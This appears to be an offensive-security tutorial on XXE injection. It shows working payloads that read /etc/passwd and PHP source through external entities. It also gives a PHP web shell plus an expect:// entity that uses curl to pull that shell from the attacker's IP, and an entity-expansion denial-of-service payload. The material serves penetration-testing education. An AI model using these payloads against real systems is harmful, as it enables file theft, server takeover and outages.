When a web application trusts unfiltered XML data from user input, we may be able to reference an external XML DTD document and define new custom XML entities. Suppose we can define new entities and have them displayed on the web page. In that case, we should also be able to define external entities and make them reference a local file, which, when displayed, should show us the content of that file on the back-end server.
Identifying
We see that the value of the email element is being displayed back to us on the page. To print the content of an external file to the page, we should note which elements are being displayed, such that we know which elements to inject into. In some cases, no elements may be displayed, which we will cover how to exploit in the upcoming sections.
For now, we know that whatever value we place in the <email></email> element gets displayed in the HTTP response. So, let us try to define a new entity and then use it as a variable in the email element to see whether it gets replaced with the value we defined. To do so, we can use what we learned in the previous section for defining new XML entities and add the following lines after the first line in the XML input:
<!DOCTYPE email [
<!ENTITY company "Inlane Freight">
]> In our example, the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally, so we added a new DTD before defining our entity. If the DOCTYPE was already declared in the XML request, we would just add the ENTITY element to it.
As we can see, the response did use the value of the entity we defined (Inlane Freight) instead of displaying &company;, indicating that we may inject XML code. In contrast, a non-vulnerable web application would display (&company;) as a raw value. This confirms that we are dealing with a web application vulnerable to XXE.
Note
Some web applications may default to a JSON format in HTTP request, but may still accept other formats, including XML. So, even if a web app sends requests in a JSON format, we can try changing the Content-Type header to application/xml, and then convert the JSON data to XML with an online tool. If the web application does accept the request with XML data, then we may also test it against XXE vulnerabilities, which may reveal an unanticipated XXE vulnerability.
Reading Sensitive Files
<!DOCTYPE email [
<!ENTITY company SYSTEM "file:///etc/passwd">
]>Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.
Reading Source Code
As we can see, this did not work, as we did not get any content. This happened because the file we are referencing is not in a proper XML format, so it fails to be referenced as an external XML entity. If a file contains some of XML’s special characters (e.g. </>/&), it would break the external entity reference and not be used for the reference. Furthermore, we cannot read any binary data, as it would also not conform to the XML format.
<!DOCTYPE email [
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>Remote Code Execution with XXE
In addition to reading local files, we may be able to gain code execution over the remote server. The easiest method would be to look for ssh keys, or attempt to utilize a hash stealing trick in Windows-based web applications, by making a call to our server. If these do not work, we may still be able to execute commands on PHP-based web applications through the PHP://expect filter, though this requires the PHP expect module to be installed and enabled.
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>Other XXE Attacks
Another common attack often carried out through XXE vulnerabilities is SSRF exploitation, which is used to enumerate locally open ports and access their pages, among other restricted web pages, through the XXE vulnerability. The Server-Side Attacks module thoroughly covers SSRF, and the same techniques can be carried with XXE attacks.
Finally, one common use of XXE attacks is causing a Denial of Service (DOS) to the hosting web server, with the use the following payload:
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY a0 "DOS" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
<!ENTITY a5 "&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;&a4;">
<!ENTITY a6 "&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;&a5;">
<!ENTITY a7 "&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;&a6;">
<!ENTITY a8 "&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;&a7;">
<!ENTITY a9 "&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;&a8;">
<!ENTITY a10 "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>
<root>
<name></name>
<tel></tel>
<email>&a10;</email>
<message></message>
</root>This payload defines the a0 entity as DOS, references it in a1 multiple times, references a1 in a2, and so on until the back-end server’s memory runs out due to the self-reference loops. However, this attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference